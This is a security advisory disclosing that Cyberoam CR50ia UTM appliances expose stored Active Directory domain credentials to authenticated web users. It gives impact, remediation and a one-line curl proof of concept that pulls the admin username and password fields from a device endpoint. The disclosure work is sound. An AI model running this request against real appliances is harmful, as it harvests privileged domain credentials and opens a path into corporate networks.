Hi,
Please find below the details of a vulnerability I discovered in
Cyberoam UTM device. The Vendor was notified, however I did not
receive any response from Vendor despite repeated email reminders.
SECURITY ADVISORY: cyberoam-utm-insecure-password-handling
Affected Software: Cyberoam CR50ia 10.01.0 build 678
Vulnerability: Insecure Password Handling
Severity: High
Release Date: Unreleased
I. Background
"Cyberoam Unified Threat Management appliances offer assured security,
connectivity and productivity to Small Office-Home Office (SOHO) and
Remote Office-Branch Office (ROBO) users by allowing user
identity-based policy controls."
Cyberoam UTM integrates with Active Directory. In order to query data
from a configured AD, domain credentials are stored within the device.
These credentials are retrievable by an authenticated user.
II. Description
Domain credentials are stored on the device and passed to web
clientson a diagnostic page (Identity –> Authentication –>
Authentication Server –> /Select Configured AD/ ). Authenticated
clients can thus easily access stored credentials.
A trivial check for this follows (replace cookie value):
curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah"
"http://<webserver>/corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1"|egrep
'(adminusername|passwdvalue)'
III. Impact
The vulnerability allows a malicious user to access potentially
privileged domain credentials. Should default passwords not be
changed, then this is a trivial entry point onto a Windows domain.
IV. Remediation
Do not return stored credentials to the browser.
V. Disclosure
Reported By: Saurabh Harit, Senior Security Analyst, SensePost
Discovery Date: 2011-11-01
VI. References
[1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp
Saurabh Harit
Senior Security Analyst
SensePost Pvt Ltd
Phone: +27 768006821